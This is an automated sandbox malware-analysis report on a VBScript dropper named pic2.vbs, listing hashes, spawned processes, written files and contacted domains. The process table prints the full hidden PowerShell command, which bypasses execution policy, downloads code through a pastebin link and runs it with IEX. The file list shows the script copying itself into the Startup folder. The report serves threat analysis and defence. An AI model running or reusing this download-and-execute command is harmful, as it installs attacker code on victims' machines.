File name: | pic2.vbs |
Full analysis: | https://app.any.run/tasks/bd2f1bbf-fa2f-4201-a8ce-f0ee706bc59b |
Verdict: | Malicious activity |
Analysis date: | October 14, 2019, 18:07:13 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | Non-ISO extended-ASCII text, with very long lines, with CRLF, CR line terminators |
MD5: | E8FFCAAC670358BF037C640072992836 |
SHA1: | 8647D0ED9F89F7176A575001108F05377A5300DE |
SHA256: | 04D4E919ED145EFE37FE07A215B4B0DA52259D15D6751E620007D4E085E85F63 |
SSDEEP: | 96:3GBpMkaW2aknyFccLuvJo9xoiXokokf88yaCAuMlqZnHYjuOf55on5qtS6SRefb0:3GBpMk4s4CHR5KLZnHYqyfeglMz |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2428 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\pic2.vbs" | C:\Windows\System32\WScript.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
2880 | "C:\Windows\System32\cmd.exe" /c Powershell -ExecutionPolicy Bypass -windowstyle hidden -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead($webClient.DownloadString('https://pastebin.com/raw/5hjnPXNw'));[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; runnull -exit | C:\Windows\System32\cmd.exe | — | WScript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2184 | Powershell -ExecutionPolicy Bypass -windowstyle hidden -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead($webClient.DownloadString('https://pastebin.com/raw/5hjnPXNw'));[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; runnull -exit | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2184 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\B5J0SE6W38Y8E9DD0SXJ.temp | — | |
MD5:— | SHA256:— | |||
2184 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
2184 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39a8be.TMP | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
2428 | WScript.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pic2.vbs | text | |
MD5:E8FFCAAC670358BF037C640072992836 | SHA256:04D4E919ED145EFE37FE07A215B4B0DA52259D15D6751E620007D4E085E85F63 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2184 | powershell.exe | 104.22.2.84:443 | pastebin.com | Cloudflare Inc | US | shared |
2184 | powershell.exe | 163.172.58.164:443 | 4.top4top.net | Online S.a.s. | FR | unknown |
Domain | IP | Reputation |
---|---|---|
pastebin.com |
| shared |
4.top4top.net |
| suspicious |